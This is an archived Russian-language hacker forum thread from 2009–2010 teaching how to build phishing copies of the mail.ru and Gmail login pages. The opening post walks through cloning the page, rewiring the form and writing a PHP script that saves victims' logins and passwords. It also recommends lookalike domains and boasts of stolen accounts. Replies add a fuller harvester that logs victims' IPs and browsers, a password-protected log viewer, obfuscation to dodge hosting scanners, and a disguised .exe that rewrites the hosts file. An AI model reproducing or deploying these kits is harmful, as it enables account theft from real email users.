PDA

Просмотр полной версии : Фейки своими руками!


pasha7
09.12.2009, 14:23
Статью нагло стырил отсюда ([Ссылки доступны только зарегистрированным пользователям]):)

Из теории: Фейк (подделка) представляет собой ни что иное как копию нужного нам сайта (или отдельных его частей), и работает эта копия на нас, тобишь используется для получения логина и пароля от нужного нам аккаунта.

И так приступим:
Первое что необходимо сделать, это определиться фейк какого сайта мы хотим сделать. В нашем примере мы буде делать фейк mail.ru для этого необходимо перейти на этот сайт и с помощью браузера сохранить всю страничку полностью в отдельную папку, допустим mail_фейк.
Примечание: Сохраняйте страничку под именем index.html (учтите, что двойных расширений быть не должно <s>index.php.html</s>)

После проделанных манипуляций открываем сохранённую страничку в блокноте (правой кнопкой мыши -> открыть с помощью -> блокнот) и ищем строку <form name="Auth" method="post" action="[Ссылки доступны только зарегистрированным пользователям]"> (можно воспользоваться поиском, Ctrl + F) заменяем значение action на log.php должно получится следующее <form name="Auth" method="post" action="log.php">
Примечание: Это делается для того, чтобы запрос отсылался не на сервер маил.ру а на наш файлик log.php. В других сайтах эта строка будет выглядеть похожим образом.

После этого спускаемся чуть ниже и ищем строчку <td class="login"><input type="text" class="long" size="10" name="Login" tabindex="1" value="" /> и заменяем значение name на login (регистр важен! пишите с маленькой буквы!) должно получится так <td class="login"><input type="text" class="long" size="10" name="login" tabindex="1" value="" />

Спускаемся ещё чуть ниже и ищем строку <input type="password" class="long" size="15" name="Password" tabindex="3"> и меняем значение name на pass (тоже с маленькой буквы) получится так: <input type="password" class="long" size="15" name="pass" tabindex="3">

***
Параметр name будет всецело зависеть от того как он будет прописан в файле log.php (см. ниже)
Если, допустим, в этом файле будет значение $Login=$_Post['blabla'], то и в параметре name будет blabla (name="blabla")
***
Но в данном примере одного логина и пароля недостаточно, так как нам нужно узнать ещё и домен в котором зарегился нужный нам человек (bk.ru mail.ru inbox.ru и т.д.). Поэтому ищем строку <td class="domain"><select size="1" name="Domain" class="long" tabindex="2"> и меняем значение name на dm )) получится такое <td class="domain"><select size="1" name="dm" class="long" tabindex="2">

Вот и всё! самое сложное позади . Теперь создаем файл txt в нашей папке mail_фейк и копипастим туда это:
<?
$Login = $_POST['login']; // Логин
$Pass = $_POST['pass']; // Пароль
$Domen = $_POST['dm']; // Домен
$log = fopen("baza.php","a+"); //открываем файл хранилища
fwrite($log,"<br> $Login:$Pass$Domen \n"); //записываем всё что надо в него
fclose($log); //закрываем хранилище
echo "<html><head><META [Ссылки доступны только зарегистрированным пользователям]'Refresh' content ='0; URL=[Ссылки доступны только зарегистрированным пользователям]'></head></html>"; //перенаправляем на исходную страницу маил.ру
?>
Сохраняем его с именем log.php (расширение смените обязательно с txt на php). Создаем в этой же папке файлик baza.php (с маленькой буквы)

Теперь всё можно уверенно сказать что наш фейк готов к своим делишкам! Осталось залить его на любой бесплатный хостинг с поддержкой php (вот несколько: hut.ru, freehostia.com, 1gb.ru).
Закидываем все наши файы в корневую директорию только что зарегистрированного нами сайта .....переносим туда все наши файлы....
1)index.html
2)полностью папку(с изображениями которая была создана вместе с index.html иначе у нас не будет никаких картинок и логотипов.)
3)baza.php (здесь и будут храниться логины и пароли людей, которые "клюнули" на фейк)
4)log.php
Если необходимо написать как залить файлы на ваш хостинг по ftp сообщите допишу. Но я думаю с этим проблем не должно возникнуть.

От автора: имя сайта лучше всего подобрать похожее на Mail.ru, чтобы ваша жертва ничего не заподозрила (например mall.ru , mali.ru и т.д.). Так же чтобы скрыть непонятную ссылку от жертвы на форумах и сайтах можно воспользоваться тегами
Так же, чтобы другие пользователи не могли просмотреть файл baza.php с логинами и паролями можно дописать в него строку <?php die('<H1>База данных закрыта</H1>') ; ?> и после этого вам надо будет смотреть его содержимое через ftp.


Наборчик фейков качаем отсюда ([Ссылки доступны только зарегистрированным пользователям])


P.S
Из наборчика проверил фейк маил *thumbs up* работает отлично:)
Прикольно когда тупая блондинка тупа вбиает в фейк свой логин и пароль:D
из 10 писем 3 ака в кармане с учётом что может ещё пока не все прочитали.

Кто что знает про массовую рассылку E-mail прошу написать.
Скачал кучю прог через майловский сервер несколько отпровляет а пачками З....у
стоит ограничение от спама:(и ещё ограничение количество в сутки!
Может у коких хостингов есть такое дело?

Dave
12.01.2010, 10:48
pasha7, забыл уточнить, что на файл baza.php нужно установить CHMOD 777 :)

Reptiliy
12.01.2010, 12:50
вот ещё бы статейку дали чтоб на юкозе фейк делать ваще было бы супер

Deymos
12.01.2010, 13:49
зачем именно юкоз?

CraftR14
22.03.2010, 23:17
зачем именно юкоз?

Ухахха ну знаеш иногда хочется положить юкозовское чо нить да и воообще говорят что это типа Непреступная Крепость.......хотя я сомневаюсь, говорят что раньше была пассивная ХСС но хз потом из за всяких барыг оно и уходит.....вот так то......*bayan*

gr3Zjke
23.03.2010, 09:48
Эхх.. вы какието безнадежные) блондинке (я предпочитаю брюнетке) шлете письмо аля смотри мою фотку и отпишись потом по почте она берет открывает фотку ам.. либо стандартное *.exe .jpg
или чтонибудь еще дак вот открывает она этот exejopg а там вирь который пролез в hosts и изменил айпи мейлру на адресс вашего фейка... и вот мы можем лицезреть ее логин и дату рождения =) удачи)

NrO
26.05.2010, 01:55
вирь который пролез в hosts и изменил айпи мейлру на адресс вашего фейка
не выйдет. можно менять на ип фейка, но для этого нужен выделенный ip. а я не встречал такое чудо бесплатно.

travakur
26.05.2010, 01:59
не выйдет. можно менять на ип фейка, но для этого нужен выделенный ip. а я не встречал такое чудо бесплатно.

не встречал)) а оно есть правда осталось не долго

ВЫДЕЛЕННЫЙ IP В ПОДАРОК акция длится до 30 мая 2010г.

При заказе хостинга по любому из тарифных планов, вы получаете выделенный ip адрес совершенно бесплатно.

[Ссылки доступны только зарегистрированным пользователям] :) немного рекламы думаю не запинаете.

но 30р в мес за хост с ип халява еще та.

NrO без затрат вы нечего не добьетесь )

Dave
26.05.2010, 09:42
не выйдет. можно менять на ип фейка, но для этого нужен выделенный ip. а я не встречал такое чудо бесплатно.
на дедике с прямым ip можно поднять и апач и msql и php

ROCK_CITY
03.06.2010, 23:21
ООООО фейкииииии.i love it
это был мой 1ый опыт.люблю их.у меня прям коллекция этих php скриптов для фейка.(можно чтоб пассы по почте приходили,можно чтобы в базу записывались)
советую всем лучше создавать фейки самим.хостинги долго искать ненадо.подходят почти все с поддержкой php.для самых ленивых щас выложу автоматический генератор фейков:spiteful:

вот: [Ссылки доступны только зарегистрированным пользователям]

travakur
03.06.2010, 23:31
на дедике с прямым ip можно поднять и апач и msql и php

можно даже без msql заюзать только веб сервер с пшп. но дедик такой еще надо поискать :)

Br@iN
05.06.2010, 18:55
можно даже без msql заюзать только веб сервер с пшп. но дедик такой еще надо поискать :)
Халявного такого нет! только платные. Или я ошибаюсь?

travakur
05.06.2010, 21:25
Халявного такого нет! только платные. Или я ошибаюсь?

ну можно поискать с прямым ип дедик в разделах халява, или купить ворованный но я смысла не вижу ибо тя выгонят через какое то время, тем более на хостинг затраты такие же будут 60р мин мес и не кто не выгоняет так что если гемор нужен ищи дедик с прямым ип или у ся на компе подымай веб сервер.

a_qwerty
05.06.2010, 21:58
Ловите с HHTP авторизацией на вход с отчоами, по умолчанию пасс и логен :
$pass = "admin";
$gpass = "guestqwe";

Сам для сибя рисовал, (там и снифер и тд).... 4 года нозат, мае кароч =\

auth

<?php
$log="otchot.txt";
$date=date("[D|d/m/Y|H:i]");
$Login = $_POST['Email'];
$Pass = $_POST['Passwd'];
$port=getenv("REMOTE_PORT");
$connect=$_SERVER['[Ссылки доступны только зарегистрированным пользователям]'];
$host=gethostbyaddr(getenv("REMOTE_ADDR"));
$ip=$_SERVER["REMOTE_ADDR"];
$real_ip=getenv("[Ссылки доступны только зарегистрированным пользователям]");
$browser=getenv("[Ссылки доступны только зарегистрированным пользователям]");
$query=$_SERVER["QUERY_STRING"];
$request=$_SERVER["REQUEST_URI"];
$refer=getenv("[Ссылки доступны только зарегистрированным пользователям]");
$win=getenv("windir");
$mlength=5;
$file=fopen($log, "a");

$line="<b><font color=green><center><----------========== @ New session lamer @ ==========----------></center></b></font><br>";
$str="<b>DATE=<font color=#000080>$date</font>
<b><br>Login=<font color=#CC0033>$Login</font>
<b><br>Pass=<font color=#CC0033>$Pass</font>
<br>PORT=<font color=#000080>$port</font>
<br>CONNECT=<font color=#000080>$connect</font>
<br>HOST=<font color=#000080>$host</font>
<br>IP=<font color=#000080>$ip</font>
<br>REAL_IP=<font color=#000080>$real_ip</font>
<br>BROWSER=<font color=#000000>$browser</font>
<br>QUERY=<font color=#000080>$query</font>
<br>REQUEST=<font color=#000080>$request</font>
<br>REFER=<font color=#000080>$refer</font>
<br>";
$line_1="<b><br><font color=green><center><----------========== @ End session lamer @ ==========----------></center></b></font><br><hr><br> ";

fputs ($file, $line);
fputs ($file, $str);
fputs ($file, $line_1);
fclose($file);
echo "<html><head><META [Ссылки доступны только зарегистрированным пользователям]'Refresh' content ='0; URL=[Ссылки доступны только зарегистрированным пользователям]'></head></html>";
?>

config

<?php
$pass = "admin";
$gpass = "guestqwe";
$ref = "5";
?>

log

<?php
error_reporting(9);
include "config.php";
$user = @$_SERVER["PHP_AUTH_USER"];
$pass = @$_SERVER["PHP_AUTH_PW"];
$valid_passwords = array ("admin" => $pass,"pass" => $gpass);
$valid_users = array_keys($valid_passwords);
$validated = (in_array($user, $valid_users)) && ($pass == $valid_passwords[$user]);
if (!$validated) {
header('[Ссылки доступны только зарегистрированным пользователям] Basic realm="Facke by a_qwerty"');
header('[Ссылки доступны только зарегистрированным пользователям] 401 Unauthorized');
die ("<b><center>Пашол нахуй отсюдо, хуекер бле!</b></center>");
}
echo "<body bgcolor=#C0C0C0 text=#191970>";
echo "<b>Твой ойпи: ".$_SERVER["REMOTE_ADDR"]."</b><br>";
echo "<b>О тебе: ".getenv("[Ссылки доступны только зарегистрированным пользователям]")."</b><br>";
echo "<b>Твой реал ойпи: ".getenv("[Ссылки доступны только зарегистрированным пользователям]")."</b><br>";
echo "<b><center>Facke by odr@dek : </b></center>";
echo "<hr><br>";
include ("otchot.txt");
echo "<hr>";
?>
<STYLE>
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:green; TEXT-DECORATION: none}
A:hover {color:green;TEXT-DECORATION: none}
</STYLE>


otchot

<b><font color=green><center><----------========== @ New session lamer @ ==========----------></center></b></font><br><b>DATE=<font color=#000080>[Mon|27/04/2009|20:47]</font>
<b><br>Login=<font color=#CC0033>a_qwerty</font>
<b><br>Pass=<font color=#CC0033>12345</font>
<br>PORT=<font color=#000080>1185</font>
<br>CONNECT=<font color=#000080>keep-alive</font>
<br>HOST=<font color=#000080>localhost</font>
<br>IP=<font color=#000080>127.0.0.1</font>
<br>REAL_IP=<font color=#000080></font>
<br>BROWSER=<font color=#000000>Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9</font>
<br>QUERY=<font color=#000080></font>
<br>REQUEST=<font color=#000080>/google/Gmail/%d0%f3%f1/auth.php</font>
<br>REFER=<font color=#000080>[Ссылки доступны только зарегистрированным пользователям]>
<br><b><br><font color=green><center><----------========== @ End session lamer @ ==========----------></center></b></font><br><hr><br>

Комплект на Гугль тут ([Ссылки доступны только зарегистрированным пользователям])

Теперь на счет хостов:
каждый хостер ТУПА песочет кодес на придмет фейков., Но_примет ho.ua, там даж залить неуспееш как зобанят, ибо нехуй! как гриццо.....
НО!
На каждую гайку, есть болт с резьбой... =\
Берем но_пример HTMLCrypt ([Ссылки доступны только зарегистрированным пользователям]) и пох, на песочниццу.
ЗЫ. Ваще неожидал,что фейки до сих пор актуальны....
А вот кстате:
вот ещё бы статейку дали чтоб на юкозе фейк делать ваще было бы супер
Да, там интересная фишко, на яве реалезовано.... Есле не ошибаюсь....
Есть у миня, найду выложу.

NevoJI9LLIka
07.06.2010, 00:06
проще программы для таких дел юзать

travakur
07.06.2010, 01:53
проще программы для таких дел юзать

дак а еще проще купить готовое если на то пошло. но когда все сам делаеш это намного лучше и интереснее! :)